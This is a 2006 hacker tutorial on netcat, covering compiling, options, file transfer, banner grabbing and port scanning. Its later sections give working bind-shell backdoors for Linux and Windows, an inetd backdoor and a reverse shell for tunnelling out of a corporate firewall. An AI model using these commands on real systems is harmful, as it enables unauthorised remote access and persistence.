/\_/\ Hacking With Your Cat - Ver 1.2 / 0 0 \ Last Update 12-10-2006 ====v==== By: magikh0e < h0e at IHTB d0t org> \ W / Http://www.IHTB.org | | _ / ___ \ / `> / / \ \ | (((-----)))-' / ( ___ \__.=|___E / ToC: 0x1 - What is Netcat -> Author -> Feature's -> Download 0x2 - Netcat Explained (Nix/Windows) -> Compiling Netcat -> -DGAPING_SECURITY_HOLE -> -DTELNET -> Build Netcat -> Supported OS -> Options & Switches -> Basic usage Examples -> File Transfer -> Telnet Client/Server 0x3 - Hacking with the cat -> Banner Grabbing -> HTTP -> DNS -> Fun with Ports -> Port Redirection -> Port Scanning -> Backdoors -> Basic Backdoor -> Inetd Backdoor -> Bypassing The Firewall -> Reverse Telnet Sessions 0x1 -What is Netcat--> Netcat is a tool similar to the Linux command cat. The cat command concatenates files and prints them, this is basically what netcat does. Instead of concatenating files, Netcat concatenates the TCP and UDP sockets. Overall point of view is that netcat can be viewed as a simple telnet program, but then again would you call a Swiss army knife, a simple knife? -=* Compiling Netcat *=- [ Enable -DGAPING_SECURITY_HOLE ] While this option makes netcat very powerfull, it is also a huge risk in the wrong hands.. Damn hackers. [ Enable -DTELNET ] Without this option netcat will be unable to connect to a telnet server. Telnet servers & there clients auto negotiate there options before the login prompt is displayed. Enabling this option allows netcat to support this functionality. # DFLAGS = -DTEST -DDEBUG DFLAGS = -DGAPING_SECURITY_HOLE -DTELNET CFLAGS = -O Linux users, modify the netcat.c file and add #include "resolv.h" on line 30. #include "resolv.h" #include "generic.h" /* same as with L5, skey, etc */ You are now ready to rock. Compile netcat by typing make SYSTEM, replace SYSTEM with your OS. If your OS is not supported, you can try using 'make generic' Supported OS: Linux Irix OSF MSDOS BugLix SunOS AIX Solaris FreeBSD BSDi NetBSD HPUX UnixWare NeXTSTEP Generic -=* Netcat's Author(s) *=- Hobbit (hobbit@avian.org) created netcat in 1995 as a feature-rich network debugging and exploration tool. Its purpose was to be able to create just about any type of network connection. According to Hobbit- The original version of netcat was released to run on Unix and Linux. Weld Pond (weld@l0pht.com) released the Windows NT version in 1998. -=* Netcat Features *=- * OUTbound or INbound connections, TCP or UDP, to or from any ports * Full DNS forward/reverse checking, with appropriate warnings * Ability to use any local source port * Ability to use any locally-configured network source address * Built-in port-scanning capabilities, with randomization functionality * Built-in loose source-routing capability * Can read command line arguments from standard input * Slow-send mode, one line every X seconds * Optional ability to let another program service the INbound connections -=* Download Netcat *=- * Microsoft http://www.vulnwatch.org/netcat/nc111nt.zip * Linux/Unix/BSD http://www.vulnwatch.org/netcat/nc110.tgz * GNU http://netcat.sourceforge.net/ 0x2 -Netcat Options Explained (Nix/Win)--> Connecting to a server: nc [-options] hostname port[s] [ports] Listen for INbound connection requests: nc -l -p port_number [-options] [hostname] [port] Options: -d (windows) detach from console, background mode. -e program This option allows you to specify a file to exec upon connection [* -e switch only works when netcat is compiled with the option -DGAPING_SECURITY_HOLE *] -b Allow broadcasts -g gateway Source routing hop point[s], up to 8 -G number Source routing pointer: 4, 8, 12, ... -h Help & Usage. -i seconds Delay interval for lines sent, ports scanned, listen mode, for inbound connects. -l Listen mode, inbound. -L(windows) Continue to listen on socket close -n Use ip address only, do not try to resolve DNS -o filename Hex dump of traffic to specified file. -p port Local port number -r Randomize local & remote ports -q seconds(Linux) quit after EOF on STDIN, then delay for specified amount of seconds. -s address Local source address -t Answer to telnet negotiations -u Operate in UDP mode -v verbose, -vv is twice more verbose -w seconds Timeout value for connects and final net reads -z Zero I/O mode, normally used for scanning. -=* Netcat Basic Usage Examples *=- Note: Using netcat with ports below 1024 requires root access. - Linux/Unix - [ Simple Listening TCP server ] [ Simple Listening UDP server ] nc -l -p port_number nc -l -p port_number -u [ Redirect STDIN/STDOUT from a program ] [ Set timeout value before netcat EOF ] nc -e /path/to/some_program nc -w timeout_value [ Pipe output from some_program to netcat ] [ Pipe output from netcat to the other_program ] some_program | nc nc | other_program [ File Transferring ] The file some.file will then be transferred from the client onto the server. Make sure the wait time on your server side is a longer period, the server will be most affected by pauses during the transfer. Server: nc -v -w 30 -p 10000 1- > some.file.backup Client: nc -v -w 2 server_ip_address 10000 < some.file [ Telnet Client ] nc -vvn serverIP 23 [ Telnet Server ] nc -l -p 10000 -e /bin/bash -t <--specified to answer telnet negotiations. 0x2 -hax0ring with the cat--> -=* Banner Grabbing *=- Netcat is an excellent tool for performing banner checking, unlike telnet netcat will wait for a servers response. [ HTTP ] root@PenguinSecurity:~# printf 'HEAD / HTTP/1.0\n\n' | nc -w 10 www.ihtb.org 80 HTTP/1.1 200 OK Date: Sat, 09 Dec 2006 20:30:41 GMT Server: Apache X-Powered-By: PHP Connection: close Content-Type: text/html [ DNS ] Below is an example of using bash and netcat to fingerprint a remote DNS server. Example: checkdns ihtb.org, checkdns 210.210.210.1 checkdns() { printf 'begin-base64 644 -\np8IBAAABAAAAAAAAB3ZlcnNpb24EYmluZAAAEAADCg==\n===='| uudecode| nc -uw 1 $1 domain | strings| tail -1; } -=* Fun with Ports *=- [ Port Redirection ] Scenario (Server A - 172.16.1.1) (Server B - 172.16.1.2) (Server C - 172.16.1.3) (Server A): nc -l -p 10000 -e "nc -nvv 172.16.1.3 22" (Server C): nc -l -p 22 -e cmd.exe (Server B): nc -nvv 172.168.1.1 10000 After issuing the above command Server B connects to Server A on port 10000. Server A would then forward this connection on to Server C on port 22. Server C would then exec cmd.exe. [ Port Scanning ] Parameters -v verbose, show closed ports too. -w timeout for connection. -u udp mode, tcp mode off. Use with -w -r try the ports in random order -i delay in seconds after each port Netcat is not meant to be a nmap, but it will get the job done for you quick & dirty (;. Port[s] range accepted formats, IE. 1-1024, 2400, 3000-3200 nc -w 1 172.16.1.1 1-1024 The above command would scan the host 172.16.1.1 for open & closed ports between the range of 1-1024 TCP, waiting 1 second between each connection. Unless specified netcat will use TCP for connections UDP scanning can be performed by specifying the -u switch. You should try to always use the -vv for extra verbosity while performing scans. -=* Backdoors *=- [ Basic Listening Backdoor ] Linux: nc -l -p 10000 -e /bin/bash Linux netcat does not offer the -L switch as windows. This switch prevents the listener from closing once the user disconnects. Have no fear, we have a fix! Use the script below as a netcat wrapper to mimic the -L switch: [code] #!/bin/bash export port=${port:-$1} nc -l -p $port -e $0 & # await further connections [ $1 ]|| PROGRAM [/code] Windows Backdoor: nc -L -p 10000 -e cmd.exe [ Inetd Backdoor ] During the compile of netcat there is an option you can define GAPING_SECURITY_HOLE, When this option is defined netcat can then be used as a network server to run under inetd. Netcat can also be used in a 'inverse inetd', ie reverse telnet connection.. inetd.conf example: www stream tcp nowait root /path/to/nc -w 5 client_ip 80 -=* Bypassing the Firewall *=- Over the firewall and through the router, off to grand ma's house we go.... [ Reverse Telnet Session ] Scenario: You have access to a host on a corporate network, unfortunately the host is behind the corporate firewall. No inbound connections to the host from the Internet are being allowed, the host resides on a RFC 1918 network. Imagine the firewall is also VERY restrictive, allowing OUTbound connections only to HTTP servers. Have no fear, we can use netcat to create a tunnel out of the network. Just like the previous 'backdoor', just this time, in reverse so to speak ;) In the event an internal host is being forced to use a proxy server for HTTP, try port's 21 and/or 23. These ports are rarely behind proxies since this will cause services that typically run on these ports to have issues with connections. Client: nc -vv -l -p 80 Server: nc client_ip_address 80 -e /bin/bash The above server line will tell netcat to initiate a session to our clients IP address. Once connected the server is connected to the client, the server will then exec a /bin/bash shell. Wala... 0wnage anyone?!? That's it for now, email me if you have any questions/comments pertaining to this document. ___ /\ \ _____ ___ \:\ \ ___ /::\ \ /\__\ \:\ \ /\__\ /:/\:\ \ /:/__/ ___ /::\ \ /:/ / /:/ /::\__\ /::\ \ /\ /:/\:\__\ /:/__/ /:/_/:/\:|__| \/\:\ \__ \:\/:/ \/__/ /::\ \ \:\/:/ /:/ / ~~\:\/\__\ \::/__/ /:/\:\ \ \::/_/:/ / \::/ / \:\ \ \/__\:\ \ \:\/:/ / /:/ / \:\__\ \:\__\ \::/ / \/__/ \/__/ \/__/ \/__/